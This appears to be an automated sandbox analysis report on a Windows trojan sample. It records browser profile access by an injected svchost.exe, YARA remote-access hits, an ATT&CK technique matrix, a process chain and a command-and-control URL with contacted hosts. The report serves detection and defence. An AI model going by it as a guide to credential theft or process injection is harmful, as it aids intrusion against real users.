Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2\doomed
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\c6rta27r.default
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Windows\System32\svchost.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: Yara match File source: Process Memory Space: svchost.exe PID: 4188, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match File source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\svchost.exe Code function: 15_3_00007DF426AB59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,15_3_00007DF426AB59B0
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 35_2_0000021AB2FDD004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,35_2_0000021AB2FDD004
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | 12 Native API | 1 Create Account | 1 Abuse Elevation Control Mechanism | 1 Abuse Elevation Control Mechanism | 31 Input Capture | 14 File and Directory Discovery | Remote Desktop Protocol | 21 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 DLL Side-Loading | 3 Obfuscated Files or Information | Security Account Manager | 28 System Information Discovery | SMB/Windows Admin Shares | 31 Input Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 413 Process Injection | 1 Software Packing | NTDS | 161 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Masquerading | Cached Domain Credentials | 5 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 413 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
[Behavior graph: ID 1577525, Sample: HI6VIJERUn.exe, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100. Process chain shown: HI6VIJERUn.exe -> cmd.exe -> Hop.com -> Hop.com -> svchost.exe -> wmplayer.exe -> dllhost.exe]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| HI6VIJERUn.exe | 55% | ReversingLabs | Win32.Trojan.Generic | |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\407310\Hop.com | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Buffer | 0% | ReversingLabs | | |
| C:\Users\user\AppData\Local\Temp\Limited | 0% | ReversingLabs | | |

No Antivirus matches
No Antivirus matches

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt | 0% | Avira URL Cloud | safe | |
| http://127.01: | 0% | Avira URL Cloud | safe | |
| http://anglebug.com/68763 | 0% | Avira URL Cloud | safe | |
| http://127.0.0.1:8000/254d3199/14c90ac50(p | 0% | Avira URL Cloud | safe | |
| http://anglebug.com/82296 | 0% | Avira URL Cloud | safe | |
| https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dti | 0% | Avira URL Cloud | safe | |
| http://127.0.0.1:%u/json/list?t=%u | 0% | Avira URL Cloud | safe | |
| http://127.0.0.1:8000/254d3199/72f3a0b3 | 0% | Avira URL Cloud | safe | |
| http://127.0.0.1:8000/254d3199/14c90ac5Y | 0% | Avira URL Cloud | safe | |
| http://anglebug.com/4324YD | 0% | Avira URL Cloud | safe | |
| https://permanently-removed.invalid/reauth/v1beta/users/4 | 0% | Avira URL Cloud | safe | |
| http://anglebug.com/35025 | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| time.cloudflare.com | 162.159.200.123 | true | false | | high |
| chrome.cloudflare-dns.com | 162.159.61.3 | true | false | | high |
| gbg1.ntp.netnod.se | 194.58.203.20 | true | false | | unknown |
| x.ns.gin.ntt.net | 129.250.35.250 | true | false | | high |
| time.google.com | 216.239.35.0 | true | false | | high |
| ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high |
| ntp.time.nl | 94.198.159.10 | true | false | | high |
| time-a-g.nist.gov | 129.6.15.28 | true | false | | high |
| googlehosted.l.googleusercontent.com | 172.217.17.65 | true | false | | high |
| time.facebook.com | 129.134.25.123 | true | false | | high |
| clients2.googleusercontent.com | unknown | unknown | false | | high |
| gbg1.ntp.se | unknown | unknown | false | | unknown |
| time.windows.com | unknown | unknown | false | | high |
| msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiF | unknown | unknown | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt | true | Avira URL Cloud: safe | unknown |

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                          high
                                                                                          https://anglebug.com/7246chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://127.0.0.1:%u/json/list?t=%uwmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2694366363.00007DF4F821D000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2136103443.0000021AB31AD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://anglebug.com/7369chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://anglebug.com/7489chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/?q=chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://chrome.google.com/webstorechrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://drive-daily-2.corp.google.com/manifest.json0.32.drfalse
                                                                                                      high
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drfalse
                                                                                                          high
                                                                                                          http://www.autoitscript.com/autoit3/XHop.com, 0000000A.00000000.1481481554.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000E.00000002.1684720884.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                            high
                                                                                                            https://issuetracker.google.com/161903006chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.ecosia.org/newtab/svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://drive-daily-1.corp.google.com/manifest.json0.32.drfalse
                                                                                                                  high
                                                                                                                  https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dtisvchost.exe, 0000000F.00000002.2232402260.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json0.32.drfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://127.01:svchost.exe, 0000000F.00000003.1992811813.000001C278646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://anglebug.com/3078chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://anglebug.com/7553chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://anglebug.com/5375chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://anglebug.com/4722chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 00000013.00000002.1877767613.0000422C005E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://127.0.0.1/chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875682617.0000422C0014C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1874933510.0000422C0006C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877560803.0000422C00530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://anglebug.com/7556chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://chromewebstore.google.com/chrome.exe, 00000013.00000002.1874625312.0000422C00013000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://drive-preprod.corp.google.com/manifest.json0.32.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://127.0.0.1:8000/254d3199/14c90ac50(pchrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://chrome.google.com/webstore4msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://anglebug.com/6692chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://issuetracker.google.com/258207403chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://anglebug.com/4324YDchrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://anglebug.com/3502chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://anglebug.com/3623chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://anglebug.com/3625chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://anglebug.com/3624chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://anglebug.com/5007chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://chrome.google.com/webstore?hl=en-GBchrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/3862chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000013.00000003.1860050167.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875436417.0000422C00108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880032931.0000422C00A7B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878881660.0000422C00874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858747770.0000422C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1881369455.0000422C00CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1882738549.0000422C00E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
94.198.159.10 | ntp.time.nl | Netherlands | 1140 | SIDNNL | false
194.58.203.20 | gbg1.ntp.netnod.se | Sweden | 57021 | NTP-SEAnycastedNTPservicesfromNetnodIXPsSE | false
94.245.104.56 | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | United Kingdom | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
129.6.15.28 | time-a-g.nist.gov | United States | 49 | US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS | false
129.134.25.123 | time.facebook.com | United States | 32934 | FACEBOOKUS | false
129.250.35.250 | x.ns.gin.ntt.net | United States | 2914 | NTT-COMMUNICATIONS-2914US | false
216.239.35.0 | time.google.com | United States | 15169 | GOOGLEUS | false
162.159.200.123 | time.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
